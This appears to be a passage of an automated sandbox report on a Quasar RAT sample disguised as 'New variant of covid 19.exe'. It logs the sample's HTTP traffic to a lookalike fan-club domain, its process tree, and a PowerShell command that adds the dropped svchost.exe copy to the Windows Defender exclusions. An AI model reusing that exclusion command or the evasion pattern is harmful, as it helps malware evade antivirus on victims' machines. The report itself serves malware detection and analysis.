                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=d001dbf1a5389235131816560dbfb273f1615324759; expires=Thu, 08-Apr-21 21:19:19 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:17 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74de090000c29f93b5c000000001
                                                                        Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=gATCpJT1pXklzjdIXpZyfYBLu5S9TBi8jrSxYidYY4T4PliD0js5CYeKwDxI8Z2wef9woAnAbKyuguXEfbv2Mp6LzVQaI57JeapPnLYG9mnHUdv6xaT7xg%3D%3D"}]}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d757434e25c29f-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" href=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        3 | 192.168.2.3 | 49727 | 104.21.31.39 | 80 | C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Mar 9, 2021 22:19:21.926287889 CET | 7889 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Connection: Keep-Alive
                                                                        Mar 9, 2021 22:19:22.362190008 CET | 7890 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:22 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=da76053200a110a83d8f4a44715963cb41615324761; expires=Thu, 08-Apr-21 21:19:21 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:12 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74e7640000c277322e8000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=XhAysjXNuxNREf1ibKoYnwdr3kEgR5mS4YGBRJniqyFTMHzOCN7orISz%2FIRuE9EZsdChzwXNx9jNATRgdBVUI7XWRvb98lm3DwSDVvMQuuwOwLNpwnyYHA%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d757523851c277-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" hre
                                                                        Mar 9, 2021 22:19:23.169635057 CET | 9181 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:19:23.385524035 CET | 9183 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:23 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=d2230e2290a747efdd31bc1e7be1c1b8a1615324763; expires=Thu, 08-Apr-21 21:19:23 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:15 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74ec410000c27713874000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=11C2K0ApXb9PVdsJzfnrbD4kIuB65zwQ71xaMAyd15prFTG2t7%2BAvcYyyBuZuotTb2dYWKX%2BJKXJGJDpi0Y2JaT0dYQ6JaMYxbr2%2BewjXB4kMYTB9jgH4w%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d7575a0836c277-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect"
                                                                        Mar 9, 2021 22:19:30.728245020 CET | 10488 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:19:30.942941904 CET | 10489 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:30 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=dbd757233c3565ddd8d21ad4ff634d5161615324770; expires=Thu, 08-Apr-21 21:19:30 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:17 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba7509c50000c27717115000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2B%2FSNKcKlq2%2F%2F5N%2B3BmNJnIirp96AZz19osN4Nq6JTNLRDpaRZMzkEv9r%2Bc6NMUR8acjDv8ReE%2FtbWLLL5ee0M5WoGf50wALXScncU22M3fmfbgTEVUtFTA%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d757893fddc277-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="pre


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        System Behavior

                                                                        General

                                                                        Start time:22:18:39
                                                                        Start date:09/03/2021
                                                                        Path:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\New variant of covid 19.exe'
                                                                        Imagebase:0xf20000
                                                                        File size:45816 bytes
                                                                        MD5 hash:A489513CA0DE2472E0AD79830DD9AC44
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:low

                                                                        General

                                                                        Start time:22:18:46
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:18:53
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
                                                                        Imagebase:0x920000
                                                                        File size:430592 bytes
                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:18:53
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:18:54
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                        Imagebase:0xbd0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:18:54
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:18:55
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:timeout 1
                                                                        Imagebase:0x810000
                                                                        File size:26112 bytes
                                                                        MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:18:57
                                                                        Start date:09/03/2021
                                                                        Path:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        Imagebase:0xcd0000
                                                                        File size:45816 bytes
                                                                        MD5 hash:A489513CA0DE2472E0AD79830DD9AC44
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:22:18:59
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 1956
                                                                        Imagebase:0xe10000
                                                                        File size:434592 bytes
                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:19:05
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:19:07
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:19:08
                                                                        Start date:09/03/2021
                                                                        Path:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
                                                                        Imagebase:0x1d0000
                                                                        File size:45816 bytes
                                                                        MD5 hash:A489513CA0DE2472E0AD79830DD9AC44
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:low

                                                                        General

                                                                        Start time:22:19:09
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:19:15
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:19:16
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:19:17
                                                                        Start date:09/03/2021
                                                                        Path:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
                                                                        Imagebase:0x630000
                                                                        File size:45816 bytes
                                                                        MD5 hash:A489513CA0DE2472E0AD79830DD9AC44
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:low

                                                                        General

                                                                        Start time:22:19:19
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:22:19:20
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Start time:22:19:21
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Start time:22:19:21
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Start time:22:19:22
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Start time:22:19:22
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                        Imagebase:0x7ff6f6180000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Start time:22:19:24
                                                                        Start date:09/03/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                        Imagebase:0x7ff7488e0000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        General

Start time: 22:19:26
Start date: 09/03/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff7488e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 22:19:38
